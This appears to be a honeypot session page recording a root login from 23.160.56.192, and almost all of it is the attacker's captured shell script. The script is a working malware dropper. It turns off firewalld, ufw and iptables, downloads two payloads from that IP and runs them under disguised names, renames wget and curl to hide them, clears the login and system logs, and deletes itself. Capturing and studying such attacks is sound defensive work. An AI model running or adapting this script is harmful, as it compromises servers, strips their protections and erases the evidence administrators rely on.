Session 59c0abaa-1e41-4987-aa9c-41f82772ad45

Session Info
IP23.160.56.192
CountryUS
Usernameroot
Shelladventure
Exec Command#!/bin/sh wdir="/tmp" for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do if [ -w "$i" ]; then wdir="$i" break fi done cd "$wdir" || exit 1 disable_firewall() { systemctl stop firewalld ufw >/dev/null 2>&1 systemctl disable firewalld ufw >/dev/null 2>&1 service firewalld stop >/dev/null 2>&1 service ufw stop >/dev/null 2>&1 if command -v iptables >/dev/null 2>&1; then iptables -P INPUT ACCEPT >/dev/null 2>&1 iptables -P FORWARD ACCEPT >/dev/null 2>&1 iptables -P OUTPUT ACCEPT >/dev/null 2>&1 iptables -F >/dev/null 2>&1 iptables -X >/dev/null 2>&1 iptables -t nat -F >/dev/null 2>&1 iptables -t nat -X >/dev/null 2>&1 fi } disable_firewall download_and_run() { url="$1" filename="$2" if [ -f "./$filename" ] && [ -x "./$filename" ]; then setsid "./$filename" >/dev/null 2>&1 & return 0 fi dl_bin="" dl_args="" if command -v good >/dev/null 2>&1; then dl_bin="good" dl_args="--no-check-certificate -q $url -O $filename" elif command -v cool >/dev/null 2>&1; then dl_bin="cool" dl_args="-skL $url -o $filename" elif command -v wget >/dev/null 2>&1; then dl_bin="wget" dl_args="--no-check-certificate -q $url -O $filename" elif command -v curl >/dev/null 2>&1; then dl_bin="curl" dl_args="-skL $url -o $filename" fi if [ -z "$dl_bin" ]; then apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1 yum install -y wget curl >/dev/null 2>&1 if command -v wget >/dev/null 2>&1; then dl_bin="wget" dl_args="--no-check-certificate -q $url -O $filename" fi fi if [ -n "$dl_bin" ]; then $dl_bin $dl_args >/dev/null 2>&1 if [ -f "$filename" ]; then chmod +x "$filename" setsid "./$filename" >/dev/null 2>&1 & fi fi } lock_tools() { command -v chattr >/dev/null 2>&1 && chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1 w_path=$(which wget 2>/dev/null) if [ -n "$w_path" ]; then case "$w_path" in *good*) ;; *) mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1 ;; esac fi c_path=$(which curl 2>/dev/null) if [ -n "$c_path" ]; then case "$c_path" in *cool*) ;; *) mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1 ;; esac fi } SERVER_IP="23.160.56.192" download_and_run "http://$SERVER_IP/vos.txt" "system_update" download_and_run "http://$SERVER_IP/vox.txt" "network_conf" lock_tools cleanup() { for log in /var/log/wtmp /var/log/btmp /var/log/lastlog /var/log/syslog /var/log/auth.log; do if [ -f "$log" ]; then echo > "$log" 2>/dev/null fi done rm -f "$0" } cleanup exit 0
Score-
Connected2026-02-25 06:32:55 UTC
Disconnected 2026-02-25 06:32:56 UTC

No recorded events for this session.

← Back to dashboard